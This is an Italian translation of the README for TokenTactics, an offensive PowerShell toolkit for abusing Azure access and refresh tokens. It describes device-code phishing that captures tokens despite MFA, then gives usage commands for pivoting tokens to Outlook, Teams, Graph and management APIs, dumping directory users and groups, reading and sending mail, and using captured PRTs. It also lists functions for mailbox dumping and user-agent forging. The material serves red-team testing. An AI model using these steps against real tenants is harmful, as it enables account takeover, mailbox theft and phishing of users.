
Set di strumenti per la manipolazione di token JWT di Azure
Set di strumenti per la manipolazione di Azure JSON Web Token ("JWT")
I token di accesso di Azure consentono di autenticarsi su determinati endpoint come un utente che accede tramite un codice di dispositivo. Anche se l'utente ha usato l'autenticazione a più fattori. Una volta ottenuto il token di accesso di un utente, potrebbe essere possibile accedere a determinate app come Outlook, SharePoint, OneDrive, MSTeams e altro.
Ad esempio, se hai un token Graph o MSGraph, puoi connetterti ad Azure e dumpare utenti, gruppi, ecc. Potresti quindi, a seconda delle policy di accesso condizionale, passare a un token Azure Core Management ed eseguire AzureHound. Poi, passare a un token Outlook e leggere/inviare email o MS Teams e leggere/inviare messaggi!
Per ulteriori informazioni sui tipi di token di Azure, vedi token di accesso della piattaforma di identità Microsoft
Ci sono alcuni esempi di richieste agli endpoint nella cartella resources. C'è anche un modello di phishing di esempio per il device code phishing.
Puoi anche usare questi token con AAD Internals. Consigliamo vivamente di provare questo fantastico strumento.
Import-Module .\TokenTactics.psd1
Get-Help Get-AzureToken
Invoke-RefreshToSubstrateToken
Get-AzureToken -Client MSGraph
Una volta che l'utente ha effettuato l'accesso, ti verrà presentato il JWT e verrà salvato nella variabile $response. Per accedere al token di accesso usa $response.access_token dalla finestra PowerShell per visualizzare il token. Puoi anche visualizzare il token di aggiornamento con $response.refresh_token. Suggerimento: ti servirà il refresh token per continuare ad aggiornare nuovi token di accesso! Di default, i risultati di Get-AzureToken vengono registrati in TokenLog.log.
Get-AzureToken -Client DODMSGraph
Invoke-RefreshToOutlookToken -domain myclient.org -refreshToken 0.A
$OutlookToken.access_token
Connect-AzureAD -AadAccessToken $response.access_token -AccountId [email protected]
Una volta catturato un PRT, autenticati con roadrecon per ottenere il tuo access_token e refresh_token. Quando aggiorni con TokenTactics, usa ClientID 1b730954-1685-4b74-9bfd-dac224a7b894.
Invoke-RefreshToMSGraphToken -domain myclient.org -ClientId 1b730954-1685-4b74-9bfd-dac224a7b894 -refreshToken 0.A
Invoke-ClearToken -Token All
Get-Command -Module TokenTactics
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-ClearToken 0.0.2 TokenTactics
Function Invoke-DumpOWAMailboxViaMSGraphApi 0.0.2 TokenTactics
Function Invoke-ForgeUserAgent 0.0.2 TokenTactics
Function Get-AzureToken 0.0.2 TokenTactics
Function Get-TenantID 0.0.2 TokenTactics
Function Invoke-OpenOWAMailboxInBrowser 0.0.2 TokenTactics
Function Invoke-ParseJWTtoken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureCoreManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToAzureManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToDODMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMAMToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSGraphToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSManageToken 0.0.2 TokenTactics
Function Invoke-RefreshToMSTeamsToken 0.0.2 TokenTactics
Function Invoke-RefreshToO365SuiteUXToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeAppsToken 0.0.2 TokenTactics
Function Invoke-RefreshToOfficeManagementToken 0.0.2 TokenTactics
Function Invoke-RefreshToOutlookToken 0.0.2 TokenTactics
Function Invoke-RefreshToSubstrateToken 0.0.2 TokenTactics
Function Invoke-RefreshToYammerToken 0.0.2 TokenTactics
I metodi di TokenTactics sono fortemente influenzati dalla grande ricerca del Dr. Nestori Syynimaa su https://o365blog.com/.